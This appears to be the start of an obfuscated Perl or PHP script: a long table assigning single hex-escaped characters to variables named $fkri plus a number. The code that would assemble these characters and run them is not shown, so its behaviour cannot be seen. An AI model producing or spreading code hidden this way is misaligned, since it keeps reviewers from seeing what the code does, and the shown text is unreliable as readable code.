$fkri316="\x24";
$fkri847="\x6d";$fkri1362="\x79";$fkri234="\x24";$fkri984="\x64";$fkri1040="\x27";$fkri350="\x7b";$fkri768="\x20";$fkri1013="\x0a";$fkri1121="\x6c";$fkri968="\x20";$fkri389="\x0a";$fkri1006="\x69";$fkri1374="\x20";$fkri901="\x20";
$fkri622="\x28";$fkri965="\x29";$fkri779="\x32";$fkri61="\x68";$fkri961="\x30";$fkri627="\x20";$fkri314="\x20";$fkri1259="\x24";$fkri736="\x69";$fkri963="\x2b";
$fkri817="\x29";
$fkri260="\x61";$fkri1067="\x72";$fkri1248="\x6a";$fkri1099="\x73";$fkri1318="\x20";$fkri391="\x09";$fkri438="\x72";$fkri875="\x63";$fkri1614="\x0a";$fkri1673="\x6c";$fkri206="\x64";
$fkri1251="\x24";
$fkri915="\x2e";$fkri1417="\x6e";$fkri523="\x65";$fkri189="\x40";$fkri1566="\x20";$fkri1458="\x23";$fkri551="\x40";$fkri46="\x39";
$fkri1534="\x73";$fkri1434="\x0a";$fkri477="\x68";
$fkri491="\x72";$fkri1267="\x24";$fkri784="\x29";$fkri1684="\x22";$fkri1060="\x6c";$fkri367="\x20";$fkri800="\x23";
$fkri596="\x28";
$fkri848="\x65";$fkri542="\x73";$fkri1446="\x24";
$fkri750="\x20";$fkri1082="\x74";$fkri1235="\x20";$fkri956="\x61";$fkri691="\x78";$fkri1435="\x09";$fkri1353="\x3b";
$fkri1415="\x20";$fkri515="\x65";$fkri368="\x73";$fkri1386="\x20";$fkri920="\x22";$fkri1659="\x70";$fkri44="\x30";$fkri1410="\x22";$fkri997="\x61";$fkri900="\x3d";$fkri539="\x28";$fkri1113="\x65";
$fkri1335="\x3b";$fkri1618="\x6e";
$fkri544="\x72";$fkri734="\x5b";
$fkri129="\x65";$fkri220="\x73";
$fkri1710="\x24";$fkri182="\x30";$fkri278="\x61";$fkri1356="\x66";$fkri633="\x20";$fkri1228="\x24";$fkri813="\x76";$fkri209="\x65";$fkri856="\x72";$fkri1096="\x0a";$fkri1139="\x29";$fkri681="\x64";
$fkri793="\x3b";$fkri1153="\x6d";$fkri495="\x69";$fkri1243="\x24";$fkri1132="\x61";$fkri752="\x3d";
$fkri311="\x66";$fkri186="\x6d";
$fkri358="\x20";$fkri792="\x29";$fkri215="\x29";$fkri562="\x0a";$fkri1581="\x0a";$fkri191="\x63";$fkri1593="\x6f";
$fkri269="\x6f";$fkri1019="\x64";$fkri1037="\x61";
$fkri71="\x73";$fkri323="\x20";$fkri1515="\x67";$fkri669="\x72";$fkri1594="\x72";
$fkri1639="\x6e";$fkri1584="\x63";$fkri288="\x68";$fkri985="\x65";
$fkri263="\x61";$fkri1527="\x6f";$fkri1188="\x74";
$fkri1312="\x09";$fkri880="\x3b";$fkri866="\x20";$fkri1138="\x32";$fkri471="\x64";$fkri975="\x0a";$fkri1231="\x5b";$fkri1033="\x61";$fkri444="\x65";$fkri308="\x74";$fkri837="\x22";$fkri1550="\x69";$fkri1402="\x73";$fkri950="\x28";$fkri443="\x6b";$fkri1069="\x6e";$fkri1275="\x61";$fkri1368="\x20";$fkri152="\x7b";$fkri317="\x69";$fkri387="\x29";$fkri1226="\x09";$fkri1177="\x09";$fkri1523="\x6f";
$fkri219="\x09";$fkri1476="\x65";
$fkri276="\x63";
$fkri861="\x20";$fkri931="\x20";$fkri458="\x6f";$fkri1337="\x09";$fkri111="\x65";$fkri395="\x68";$fkri1648="\x65";$fkri583="\x3d";$fkri959="\x28";
$fkri1171="\x3b";$fkri1044="\x0a";$fkri775="\x61";$fkri1169="\x24";
$fkri456="\x20";$fkri168="\x69";$fkri895="\x6f";$fkri479="\x6d";$fkri1422="\x6e";$fkri1571="\x6e";
$fkri1660="\x72";$fkri48="\x53";$fkri1004="\x2e";$fkri359="\x40";
$fkri849="\x3d";$fkri454="\x6f";
$fkri19="\x6f";$fkri1538="\x65";$fkri767="\x25";$fkri803="\x61";
$fkri576="\x72";$fkri1296="\x62";$fkri912="\x6d";$fkri978="\x0a";$fkri1682="\x63";
$fkri1240="\x3d";$fkri1635="\x76";$fkri631="\x24";
$fkri519="\x66";$fkri1291="\x0a";
$fkri1583="\x6e";$fkri1555="\x20";$fkri474="\x23";$fkri332="\x67";$fkri371="\x73";$fkri852="\x0a";
$fkri726="\x28";$fkri29="\x6e";
$fkri241="\x72";$fkri327="\x3c";$fkri795="\x09";$fkri1384="\x69";$fkri235="\x2a";$fkri616="\x0a";$fkri548="\x2c";$fkri899="\x2e";$fkri1300="\x6e";$fkri1573="\x6e";$fkri1137="\x61";$fkri1645="\x67";
$fkri1014="\x09";$fkri483="\x20";$fkri1172="\x29";$fkri1211="\x20";$fkri1470="\x63";$fkri806="\x75";$fkri65="\x0a";$fkri862="\x3d";
$fkri1616="\x70";$fkri525="\x5f";$fkri1308="\x67";$fkri1529="\x20";$fkri887="\x20";
$fkri1279="\x6a";$fkri1022="\x2e";$fkri774="\x72";
$fkri578="\x6e";$fkri315="\x28";
$fkri781="\x29";$fkri1245="\x31";$fkri415="\x0a";$fkri1699="\x74";$fkri1412="\x63";$fkri229="\x65";
$fkri11="\x6c";$fkri825="\x0a";
$fkri1290="\x7d";$fkri1512="\x20";
$fkri47="\x20";$fkri377="\x6f";
$fkri426="\x7a";$fkri68="\x63";
$fkri832="\x65";$fkri1026="\x5c";$fkri407="\x24";$fkri520="\x69";$fkri140="\x62";$fkri1347="\x67";$fkri741="\x0a";$fkri162="\x65";$fkri227="\x69";$fkri828="\x6d";$fkri932="\x2e";$fkri413="\x0a";$fkri422="\x64";$fkri1592="\x6d";$fkri921="\x3b";$fkri547="\x74";
$fkri1352="\x22";
$fkri1200="\x31";$fkri787="\x20";$fkri537="\x6c";
$fkri339="\x64";$fkri128="\x72";$fkri1524="\x6e";$fkri1253="\x5d";$fkri814="\x61";$fkri1424="\x28";$fkri782="\x2b";$fkri372="\x74";$fkri120="\x6c";$fkri384="\x2c";
$fkri714="\x78";
$fkri823="\x6e";
$fkri92="\x6f";$fkri666="\x20";$fkri246="\x6e";$fkri381="\x20";
$fkri929="\x64";$fkri1174="\x7b";$fkri836="\x20";$fkri354="\x70";$fkri1159="\x3d";$fkri1383="\x24";$fkri514="\x74";$fkri473="\x09";
$fkri1423="\x64";$fkri1168="\x2d";$fkri586="\x61";$fkri1391="\x24";$fkri1468="\x72";$fkri859="\x24";$fkri772="\x74";$fkri1018="\x6f";$fkri1086="\x20";$fkri385="\x20";$fkri1610="\x24";$fkri1365="\x69";
$fkri1295="\x75";$fkri1147="\x09";$fkri1323="\x74";$fkri1453="\x3b";$fkri380="\x2c";$fkri923="\x09";$fkri450="\x61";$fkri201="\x2c";$fkri1361="\x6d";$fkri1150="\x72";$fkri602="\x79";$fkri659="\x63";$fkri988="\x3d";$fkri675="\x22";$fkri1693="\x67";$fkri966="\x29";$fkri706="\x65";$fkri642="\x69";
$fkri567="\x3d";
$fkri1340="\x20";$fkri1632="\x68";$fkri1456="\x0a";$fkri1472="\x72";$fkri554="\x64";$fkri516="\x72";$fkri838="\x5c";$fkri1160="\x20";
$fkri1623="\x3e";$fkri59="\x72";$fkri296="\x6c";
$fkri1202="\x29";$fkri770="\x69";$fkri1708="\x6c";
$fkri749="\x65";$fkri1320="\x20";$fkri1055="\x20";
$fkri73="\x20";$fkri277="\x68";$fkri271="\x20";$fkri1127="\x6d";$fkri207="\x65";$fkri1120="\x66";
$fkri256="\x69";$fkri831="\x64";
$fkri1553="\x0a";$fkri575="\x61";$fkri1398="\x20";$fkri369="\x75";$fkri292="\x20";$fkri680="\x25";
$fkri945="\x24";$fkri1370="\x3b";
$fkri760="\x66";$fkri1155="\x20";$fkri843="\x72";$fkri512="\x6c";$fkri1509="\x75";
$fkri1048="\x63";$fkri1401="\x20";$fkri927="\x63";
$fkri1056="\x22";$fkri684="\x22";$fkri609="\x65";
$fkri942="\x20";$fkri1039="\x65";$fkri783="\x31";$fkri827="\x24";$fkri1366="\x20";$fkri150="\x68";$fkri204="\x69";$fkri699="\x76";$fkri748="\x64";$fkri527="\x61";$fkri1486="\x61";$fkri992="\x24";$fkri1167="\x2d";$fkri1691="\x2b";$fkri452="\x6b";$fkri107="\x20";$fkri541="\x40";$fkri1705="\x65";$fkri764="\x24";
$fkri1590="\x74";$fkri365="\x74";
$fkri658="\x6d";$fkri1399="\x2e";$fkri293="\x62";$fkri727="\x24";$fkri309="\x0a";$fkri364="\x70";$fkri1131="\x24";$fkri940="\x69";$fkri763="\x28";
$fkri608="\x64";$fkri1543="\x20";$fkri1388="\x0a";$fkri1552="\x65";$fkri742="\x09";
$fkri436="\x61";$fkri1598="\x24";$fkri1375="\x3c";$fkri1465="\x69";$fkri375="\x24";$fkri1111="\x61";$fkri1596="\x68";$fkri1535="\x69";$fkri1377="\x24";$fkri812="\x65";
$fkri1077="\x09";$fkri555="\x65";$fkri1024="\x20";$fkri55="\x61";$fkri1671="\x0a";$fkri1310="\x7b";$fkri154="\x09";$fkri1604="\x70";
$fkri213="\x20";$fkri1041="\x3b";$fkri863="\x20";$fkri732="\x70";
$fkri254="\x62";$fkri105="\x74";
$fkri549="\x20";
$fkri1480="\x64";$fkri1697="\x72";$fkri212="\x3d";$fkri1229="\x61";$fkri205="\x6e";$fkri492="\x65";
$fkri644="\x74";$fkri892="\x24";$fkri320="\x20";$fkri1289="\x0a";$fkri484="\x77";$fkri582="\x20";$fkri625="\x20";$fkri910="\x6e";$fkri1351="\x22";$fkri138="\x73";$fkri136="\x2e";$fkri1315="\x20";$fkri239="\x6e";$fkri489="\x6e";$fkri1328="\x64";$fkri1504="\x20";
$fkri756="\x6e";$fkri1558="\x20";$fkri884="\x24";$fkri194="\x70";$fkri834="\x2e";
$fkri710="\x69";$fkri1025="\x22";$fkri672="\x74";$fkri989="\x20";
$fkri1288="\x7d";$fkri561="\x0a";$fkri272="\x74";$fkri1030="\x27";$fkri482="\x6f";$fkri504="\x63";$fkri104="\x68";$fkri1656="\x29";$fkri1215="\x24";$fkri211="\x20";$fkri117="\x20";
$fkri1011="\x3b";$fkri1674="\x6f";$fkri352="\x09";$fkri953="\x74";$fkri142="\x6d";
$fkri457="\x68";$fkri97="\x41";$fkri569="\x30";$fkri486="\x20";$fkri1698="\x61";$fkri75="\x65";$fkri1493="\x20";$fkri1442="\x75";$fkri49="\x65";$fkri110="\x73";$fkri545="\x69";$fkri1034="\x72";$fkri935="\x22";$fkri645="\x3b";
$fkri948="\x25";$fkri1028="\x63";
$fkri593="\x69";$fkri225="\x28";
$fkri472="\x0a";
$fkri661="\x64";
$fkri1304="\x74";$fkri844="\x5f";
$fkri334="\x68";$fkri788="\x3d";
$fkri1652="\x69";$fkri399="\x6e";$fkri1103="\x66";$fkri1144="\x5f";$fkri1307="\x6e";
$fkri1542="\x65";$fkri1197="\x20";
$fkri299="\x74";$fkri177="\x24";$fkri1213="\x66";
$fkri236="\x24";$fkri490="\x20";$fkri1687="\x22";$fkri830="\x6f";$fkri1457="\x0a";$fkri121="\x20";$fkri918="\x69";$fkri747="\x6f";
$fkri318="\x20";$fkri590="\x73";
$fkri1397="\x67";$fkri711="\x6e";$fkri53="\x74";$fkri1220="\x20";$fkri1045="\x09";$fkri258="\x64";$fkri507="\x63";$fkri1416="\x69";
$fkri1638="\x5f";$fkri306="\x69";$fkri1585="\x20";$fkri1170="\x69";$fkri1654="\x6e";$fkri249="\x0a";$fkri907="\x61";$fkri442="\x20";$fkri1342="\x73";$fkri769="\x28";
$fkri1209="\x78";
$fkri238="\x65";$fkri1369="\x30";$fkri513="\x61";$fkri257="\x6c";$fkri1252="\x69";
$fkri179="\x20";$fkri188="\x20";
$fkri624="\x69";$fkri199="\x28";$fkri131="\x65";$fkri1173="\x20";$fkri41="\x29";$fkri366="\x2c";
$fkri974="\x3b";$fkri1626="\x74";
$fkri1264="\x69";$fkri754="\x22";$fkri1642="\x65";$fkri926="\x6d";
$fkri33="\x6e";$fkri116="\x2c";$fkri697="\x20";$fkri1489="\x20";
$fkri175="\x79";$fkri1679="\x3b";$fkri730="\x72";$fkri1495="\x6e";
$fkri1053="\x2e";$fkri57="\x20";$fkri1657="\x3b";$fkri1305="\x72";
$fkri80="\x74";$fkri637="\x24";$fkri418="\x20";$fkri840="\x24";$fkri305="\x72";$fkri90="\x73";$fkri1313="\x6d";$fkri393="\x75";
$fkri500="\x6f";$fkri897="\x65";$fkri1664="\x20";$fkri1100="\x75";
$fkri1503="\x23";$fkri667="\x73";$fkri224="\x64";$fkri1354="\x0a";
$fkri1413="\x22";$fkri1246="\x5b";$fkri1073="\x3b";$fkri1522="\x69";$fkri1607="\x6e";
$fkri1479="\x6f";$fkri805="\x63";
$fkri824="\x67";
$fkri103="\x67";$fkri600="\x09";$fkri1195="\x24";
$fkri1631="\x70";$fkri648="\x2b";$fkri1690="\x2b";
$fkri1204="\x0a";$fkri524="\x72";$fkri1178="\x6d";$fkri947="\x20";$fkri1199="\x20";$fkri1242="\x40";
$fkri1521="\x74";$fkri94="\x0a";$fkri405="\x2c";$fkri731="\x69";$fkri343="\x20";$fkri801="\x20";$fkri1517="\x6e";$fkri481="\x73";$fkri723="\x6f";
$fkri1355="\x09";$fkri282="\x74";$fkri145="\x61";$fkri1683="\x3d";$fkri1129="\x20";$fkri766="\x20";$fkri715="\x65";$fkri971="\x20";
$fkri1620="\x4f";$fkri1452="\x67";$fkri1003="\x65";$fkri1429="\x39";$fkri865="\x3b";$fkri196="\x20";$fkri1273="\x40";$fkri176="\x20";$fkri412="\x7d";$fkri665="\x3d";$fkri1156="\x24";$fkri156="\x79";$fkri896="\x64";
$fkri855="\x6f";$fkri324="\x24";
$fkri509="\x64";$fkri1463="\x73";$fkri295="\x69";$fkri1516="\x65";$fkri1260="\x61";$fkri455="\x6e";$fkri89="\x72";$fkri1536="\x6e";
$fkri987="\x2e";$fkri329="\x6c";$fkri1225="\x09";$fkri497="\x64";$fkri653="\x7b";$fkri1411="\x25";
$fkri845="\x6e";$fkri465="\x68";$fkri1072="\x65";
$fkri615="\x3b";
$fkri496="\x6c";$fkri1207="\x6e";
$fkri81="\x69";$fkri1278="\x24";
$fkri56="\x6e";$fkri1293="\x0a";$fkri14="\x65";$fkri1249="\x2c";$fkri529="\x65";$fkri808="\x61";$fkri1302="\x5f";$fkri1712="\x63";$fkri1093="\x3b";$fkri411="\x09";
$fkri8="\x65";$fkri930="\x65";$fkri1624="\x6d";$fkri1589="\x65";$fkri822="\x69";$fkri82="\x6f";$fkri1441="\x74";$fkri640="\x63";
$fkri51="\x61";$fkri506="\x20";$fkri268="\x20";
$fkri1326="\x61";$fkri228="\x6d";$fkri1359="\x20";
$fkri571="\x0a";$fkri1021="\x20";
$fkri696="\x2c";$fkri360="\x73";$fkri584="\x20";$fkri1117="\x68";$fkri967="\x29";$fkri374="\x28";$fkri451="\x63";$fkri589="\x5f";$fkri148="\x72";$fkri398="\x69";
$fkri1477="\x20";$fkri264="\x72";$fkri86="\x20";$fkri291="\x68";
$fkri125="\x74";$fkri1658="\x0a";$fkri1454="\x0a";$fkri1420="\x72";$fkri744="\x24";$fkri1118="\x75";$fkri1696="\x65";$fkri944="\x28";$fkri304="\x63";$fkri1396="\x6e";$fkri1444="\x6e";$fkri328="\x20";
$fkri1268="\x6a";$fkri1049="\x6f";$fkri1238="\x5d";$fkri76="\x6e";$fkri1224="\x0a";$fkri689="\x30";$fkri729="\x63";$fkri990="\x22";
$fkri1208="\x65";$fkri682="\x3d";
$fkri357="\x68";$fkri21="\x65";$fkri218="\x0a";$fkri70="\x6e";
$fkri688="\x25";$fkri1591="\x61";$fkri1130="\x28";$fkri1551="\x7a";$fkri1317="\x6c";$fkri4="\x72";$fkri270="\x66";$fkri1298="\x72";$fkri1600="\x63";$fkri349="\x20";
$fkri185="\x09";$fkri982="\x63";$fkri26="\x70";$fkri1050="\x64";$fkri1309="\x0a";$fkri285="\x73";
$fkri1282="\x24";$fkri1250="\x20";$fkri690="\x32";$fkri1084="\x72";$fkri746="\x63";$fkri1505="\x63";$fkri1332="\x29";$fkri1001="\x61";$fkri676="\x5c";$fkri167="\x68";$fkri733="\x74";$fkri946="\x69";$fkri818="\x20";$fkri342="\x3b";$fkri693="\x22";$fkri469="\x6c";
$fkri1230="\x31";
$fkri1306="\x69";
$fkri1554="\x23";$fkri427="\x65";
$fkri114="\x65";$fkri1303="\x73";$fkri144="\x74";
$fkri286="\x20";
$fkri873="\x23";$fkri32="\x65";$fkri466="\x75";$fkri1071="\x6d";$fkri1266="\x20";$fkri1562="\x77";$fkri1707="\x61";$fkri1027="\x24";$fkri232="\x25";$fkri804="\x6c";$fkri558="\x73";$fkri954="\x28";$fkri1292="\x0a";$fkri172="\x0a";
$fkri604="\x24";$fkri447="\x20";$fkri1407="\x74";$fkri1175="\x0a";$fkri1404="\x72";$fkri1083="\x75";$fkri432="\x69";
$fkri300="\x68";$fkri1161="\x40";$fkri1491="\x6f";
$fkri919="\x2e";$fkri208="\x78";$fkri467="\x66";$fkri867="\x24";$fkri113="\x76";$fkri1299="\x61";$fkri1017="\x63";$fkri98="\x6c";
$fkri1556="\x69";$fkri1613="\x3b";$fkri383="\x69";$fkri250="\x0a";$fkri1650="\x61";$fkri351="\x0a";$fkri796="\x7d";$fkri437="\x72";
$fkri1214="\x20";$fkri1546="\x64";$fkri494="\x75";$fkri1647="\x6e";
$fkri1164="\x31";$fkri1065="\x76";$fkri1076="\x0a";$fkri1181="\x24";$fkri1062="\x5c";$fkri1540="\x74";$fkri1570="\x6f";$fkri606="\x63";
$fkri214="\x28";$fkri1166="\x20";$fkri721="\x2c";$fkri722="\x20";$fkri670="\x69";$fkri1488="\x73";$fkri536="\x66";$fkri1068="\x5f";
$fkri1333="\x2b";$fkri230="\x28";$fkri294="\x75";$fkri508="\x6f";$fkri656="\x09";$fkri1234="\x2c";$fkri2="\x6d";$fkri200="\x29";
$fkri1502="\x0a";$fkri557="\x65";$fkri1257="\x09";$fkri890="\x09";$fkri161="\x64";$fkri673="\x66";$fkri815="\x6c";
$fkri1525="\x73";$fkri1586="\x3d";$fkri842="\x61";$fkri655="\x09";$fkri720="\x5d";
$fkri1345="\x69";$fkri28="\x69";
$fkri64="\x72";$fkri337="\x63";$fkri1141="\x3d";
$fkri435="\x20";$fkri511="\x20";$fkri1702="\x6e";$fkri223="\x6e";$fkri853="\x09";$fkri1704="\x0a";$fkri933="\x3d";$fkri1498="\x20";$fkri252="\x23";$fkri502="\x72";$fkri1630="\x72";$fkri1162="\x24";$fkri879="\x74";$fkri1020="\x65";$fkri635="\x3d";$fkri1031="\x24";$fkri1054="\x3d";$fkri77="\x65";$fkri1193="\x64";$fkri1184="\x3d";$fkri601="\x6d";$fkri1563="\x69";$fkri132="\x72";$fkri1621="\x2c";$fkri388="\x3b";$fkri431="\x72";$fkri102="\x69";$fkri629="\x3b";$fkri973="\x29";$fkri983="\x6f";$fkri1597="\x28";$fkri1668="\x6e";$fkri521="\x73";$fkri1114="\x73";$fkri127="\x20";$fkri181="\x20";$fkri338="\x6f";$fkri297="\x64";$fkri347="\x69";$fkri889="\x0a";$fkri1609="\x20";$fkri243="\x74";$fkri303="\x73";$fkri1158="\x20";$fkri1605="\x72";$fkri1183="\x20";$fkri1043="\x3b";$fkri638="\x23";$fkri1032="\x76";$fkri1400="\x3d";$fkri1625="\x65";$fkri517="\x0a";$fkri1651="\x74";$fkri618="\x66";$fkri1643="\x2d";
$fkri1244="\x61";$fkri649="\x24";$fkri980="\x24";$fkri1079="\x09";
$fkri1376="\x20";$fkri883="\x2b";
$fkri370="\x62";$fkri12="\x20";$fkri464="\x73";$fkri695="\x22";$fkri1661="\x69";$fkri1367="\x3d";$fkri1094="\x0a";$fkri1588="\x6d";$fkri1090="\x6f";
$fkri1223="\x3b";$fkri976="\x09";$fkri1665="\x4f";$fkri798="\x0a";$fkri1677="\x20";$fkri164="\x3d";$fkri868="\x69";$fkri594="\x6e";$fkri13="\x50";
$fkri416="\x09";$fkri187="\x79";$fkri133="\x73";$fkri400="\x64";$fkri169="\x66";$fkri409="\x3b";$fkri871="\x20";$fkri703="\x6e";$fkri1459="\x20";$fkri1700="\x69";$fkri1102="\x20";$fkri302="\x20";
$fkri700="\x61";$fkri878="\x70";$fkri362="\x72";$fkri1371="\x20";
$fkri1078="\x0a";$fkri810="\x65";$fkri709="\x24";$fkri123="\x65";$fkri348="\x29";$fkri69="\x6f";$fkri652="\x20";$fkri522="\x68";
$fkri1075="\x3b";$fkri1206="\x09";
$fkri1381="\x2b";$fkri1051="\x65";
$fkri1672="\x63";$fkri762="\x28";$fkri1709="\x20";
$fkri267="\x79";$fkri1389="\x09";$fkri702="\x5f";$fkri253="\x20";$fkri530="\x73";
$fkri662="\x65";$fkri221="\x72";$fkri1432="\x29";$fkri180="\x3d";$fkri755="\x5c";$fkri363="\x69";
$fkri1634="\x24";$fkri1239="\x20";
$fkri79="\x61";$fkri538="\x65";$fkri1196="\x69";$fkri1212="\x69";
$fkri1180="\x20";$fkri1587="\x20";$fkri1395="\x69";$fkri913="\x65";$fkri1146="\x0a";$fkri5="\x65";$fkri460="\x20";$fkri686="\x5c";$fkri118="\x61";$fkri1711="\x6e";$fkri1063="\x24";$fkri570="\x3b";$fkri846="\x61";$fkri1125="\x0a";$fkri611="\x3d";
$fkri1577="\x6c";
$fkri1526="\x20";$fkri816="\x28";$fkri1089="\x63";$fkri1217="\x20";
$fkri274="\x65";$fkri216="\x3b";$fkri190="\x73";$fkri839="\x24";
$fkri952="\x6e";$fkri705="\x6d";$fkri829="\x63";$fkri378="\x64";$fkri312="\x6f";$fkri1394="\x72";$fkri184="\x0a";$fkri446="\x70";$fkri778="\x28";
$fkri1270="\x20";$fkri1392="\x73";
$fkri704="\x61";
$fkri429="\x73";$fkri40="\x43";$fkri247="\x29";$fkri141="\x20";$fkri1426="\x30";$fkri493="\x62";$fkri1528="\x72";$fkri1016="\x6d";$fkri255="\x75";$fkri1437="\x0a";$fkri37="\x65";$fkri281="\x63";$fkri563="\x09";$fkri1163="\x61";$fkri1261="\x32";$fkri1406="\x6e";$fkri1287="\x09";$fkri1430="\x37";$fkri1106="\x68";$fkri937="\x6e";$fkri160="\x6f";
$fkri685="\x5c";$fkri394="\x73";$fkri151="\x0a";
$fkri1565="\x67";$fkri757="\x22";$fkri1198="\x2b";
$fkri835="\x3d";$fkri1210="\x74";$fkri1334="\x32";$fkri1695="\x6e";$fkri1218="\x3d";
$fkri233="\x24";$fkri790="\x20";$fkri124="\x66";$fkri1007="\x2e";
$fkri505="\x74";$fkri777="\x64";$fkri526="\x79";$fkri999="\x5f";$fkri1066="\x61";$fkri698="\x24";$fkri981="\x6d";$fkri7="\x70";$fkri1182="\x6a";$fkri1143="\x40";$fkri902="\x22";$fkri1438="\x09";$fkri657="\x24";$fkri1511="\x65";$fkri226="\x74";$fkri1187="\x6e";$fkri424="\x6d";$fkri379="\x65";$fkri510="\x65";$fkri101="\x72";$fkri1133="\x31";$fkri355="\x75";$fkri949="\x20";$fkri807="\x6c";$fkri1219="\x3d";$fkri163="\x20";$fkri251="\x09";
$fkri1057="\x65";$fkri461="\x77";$fkri1706="\x76";$fkri1269="\x5d";$fkri1009="\x3b";$fkri881="\x20";
$fkri1390="\x09";$fkri917="\x24";$fkri1338="\x6d";$fkri735="\x24";$fkri797="\x0a";$fkri344="\x2b";$fkri592="\x72";$fkri476="\x74";$fkri1649="\x72";$fkri63="\x65";$fkri994="\x2e";$fkri498="\x20";$fkri951="\x69";$fkri872="\x24";$fkri759="\x69";$fkri650="\x69";$fkri776="\x6e";$fkri1544="\x63";$fkri503="\x65";$fkri1216="\x69";$fkri694="\x3b";$fkri361="\x63";$fkri1191="\x61";$fkri1599="\x24";$fkri31="\x20";$fkri78="\x72";$fkri401="\x65";$fkri178="\x69";
$fkri170="\x74";$fkri559="\x29";$fkri135="\x64";$fkri275="\x20";$fkri62="\x6d";
$fkri663="\x20";$fkri137="\x0a";$fkri1029="\x3d";$fkri423="\x6f";$fkri183="\x3b";$fkri261="\x6e";$fkri52="\x73";$fkri202="\x20";$fkri1487="\x6e";$fkri1714="\x0a";
$fkri1336="\x0a";$fkri1126="\x09";
$fkri242="\x61";$fkri147="\x6f";$fkri331="\x6e";$fkri991="\x5c";
$fkri22="\x20";$fkri1447="\x73";$fkri1142="\x20";$fkri1122="\x65";$fkri404="\x73";$fkri639="\x73";$fkri1136="\x24";
$fkri231="\x29";
$fkri936="\x5c";$fkri934="\x20";$fkri623="\x24";$fkri485="\x65";$fkri1241="\x20";$fkri266="\x61";$fkri88="\x65";$fkri1379="\x3b";$fkri39="\x28";$fkri1636="\x61";$fkri717="\x5b";$fkri406="\x20";$fkri632="\x69";$fkri1500="\x61";$fkri0="\x23";$fkri1092="\x65";$fkri23="\x6d";$fkri1236="\x24";$fkri540="\x5c";$fkri259="\x20";$fkri874="\x73";
$fkri6="\x2d";
$fkri1619="\x28";$fkri1265="\x2c";$fkri1149="\x6f";$fkri914="\x22";$fkri1247="\x24";$fkri1579="\x3a";$fkri789="\x3d";$fkri171="\x3b";$fkri1467="\x20";$fkri1301="\x64";$fkri321="\x30";$fkri1689="\x0a";
$fkri626="\x3d";$fkri9="\x61";$fkri301="\x65";$fkri245="\x6f";
$fkri1548="\x2d";$fkri613="\x22";$fkri998="\x72";$fkri1087="\x24";$fkri870="\x3c";$fkri886="\x29";$fkri533="\x68";$fkri1494="\x6f";$fkri1081="\x65";$fkri43="\x32";$fkri543="\x63";$fkri1519="\x72";$fkri1010="\x22";$fkri217="\x0a";$fkri1574="\x74";$fkri687="\x78";
$fkri1000="\x6e";$fkri1350="\x20";
$fkri821="\x72";$fkri605="\x6d";
$fkri326="\x20";
$fkri463="\x20";$fkri1316="\x24";$fkri1533="\x20";$fkri1582="\x24";$fkri552="\x69";$fkri528="\x74";$fkri453="\x20";$fkri597="\x29";$fkri287="\x77";$fkri928="\x6f";$fkri610="\x20";$fkri1436="\x7d";$fkri488="\x61";$fkri550="\x5c";$fkri1440="\x65";
$fkri340="\x65";$fkri1271="\x3d";$fkri809="\x74";$fkri84="\x2d";$fkri1098="\x0a";$fkri643="\x70";$fkri1008="\x22";$fkri995="\x24";$fkri197="\x3d";$fkri1653="\x6f";
$fkri1255="\x0a";$fkri1294="\x73";$fkri149="\x70";$fkri16="\x6c";$fkri1349="\x3d";$fkri1046="\x24";
$fkri1272="\x20";
$fkri1561="\x6f";
$fkri1567="\x65";$fkri518="\x09";$fkri904="\x24";$fkri67="\x20";$fkri1283="\x69";$fkri192="\x72";
$fkri173="\x09";$fkri1451="\x6e";$fkri58="\x4b";$fkri773="\x28";$fkri826="\x09";$fkri977="\x7d";$fkri353="\x09";$fkri336="\x24";
$fkri851="\x3b";$fkri581="\x65";$fkri501="\x72";$fkri566="\x20";$fkri574="\x76";$fkri414="\x0a";$fkri420="\x61";$fkri433="\x70";$fkri1205="\x09";$fkri440="\x79";$fkri1227="\x40";$fkri588="\x64";
$fkri1189="\x28";$fkri42="\x20";$fkri1194="\x28";$fkri572="\x09";
$fkri345="\x2b";$fkri1256="\x09";$fkri1061="\x20";$fkri1179="\x79";$fkri708="\x20";$fkri1473="\x73";$fkri279="\x72";$fkri93="\x6e";$fkri283="\x65";$fkri325="\x69";$fkri1611="\x6e";$fkri434="\x74";$fkri854="\x66";$fkri439="\x61";$fkri1678="\x4f";$fkri894="\x63";
$fkri403="\x65";$fkri1364="\x24";
$fkri1263="\x24";$fkri1450="\x69";$fkri1387="\x7b";$fkri580="\x6d";$fkri1052="\x20";$fkri30="\x67";$fkri478="\x65";
$fkri1575="\x69";$fkri908="\x72";$fkri924="\x09";$fkri1576="\x61";$fkri531="\x5f";$fkri719="\x69";$fkri1107="\x65";$fkri1421="\x61";$fkri310="\x09";$fkri943="\x28";$fkri1190="\x72";
$fkri707="\x2c";$fkri1622="\x22";$fkri534="\x75";$fkri677="\x24";$fkri1346="\x6e";$fkri1331="\x29";$fkri106="\x73";$fkri237="\x67";$fkri1091="\x64";$fkri1358="\x72";$fkri1469="\x65";$fkri1314="\x79";$fkri869="\x20";$fkri630="\x20";$fkri1497="\x79";$fkri1185="\x20";$fkri556="\x78";$fkri1461="\x68";$fkri573="\x24";$fkri614="\x22";$fkri1557="\x73";$fkri1274="\x24";
$fkri108="\x72";$fkri441="\x2c";
$fkri1496="\x6c";$fkri1629="\x6f";$fkri1005="\x24";$fkri87="\x76";
$fkri553="\x6e";$fkri91="\x69";$fkri408="\x69";$fkri1545="\x6f";
$fkri922="\x0a";
$fkri1686="\x63";
$fkri1559="\x67";$fkri1466="\x73";$fkri1471="\x75";$fkri15="\x72";$fkri641="\x72";$fkri802="\x63";
$fkri480="\x20";$fkri712="\x64";$fkri753="\x20";$fkri356="\x73";
$fkri970="\x3d";
$fkri430="\x63";$fkri1628="\x6d";$fkri307="\x70";$fkri916="\x22";$fkri941="\x66";$fkri210="\x73";$fkri674="\x28";
$fkri126="\x73";$fkri728="\x73";$fkri1237="\x6a";$fkri535="\x66";$fkri1002="\x6d";$fkri532="\x73";$fkri1514="\x20";
$fkri1330="\x33";$fkri579="\x61";$fkri1322="\x6e";$fkri1508="\x70";$fkri1675="\x73";$fkri1608="\x74";$fkri1568="\x78";$fkri1499="\x63";$fkri198="\x20";$fkri993="\x22";
$fkri153="\x0a";$fkri1176="\x09";
$fkri546="\x70";$fkri634="\x3c";$fkri938="\x22";$fkri925="\x24";$fkri1105="\x73";$fkri50="\x62";$fkri1483="\x20";$fkri373="\x72";$fkri1109="\x5f";$fkri10="\x72";$fkri738="\x29";$fkri850="\x22";$fkri1443="\x72";$fkri193="\x69";
$fkri621="\x20";$fkri1474="\x69";$fkri1327="\x6e";
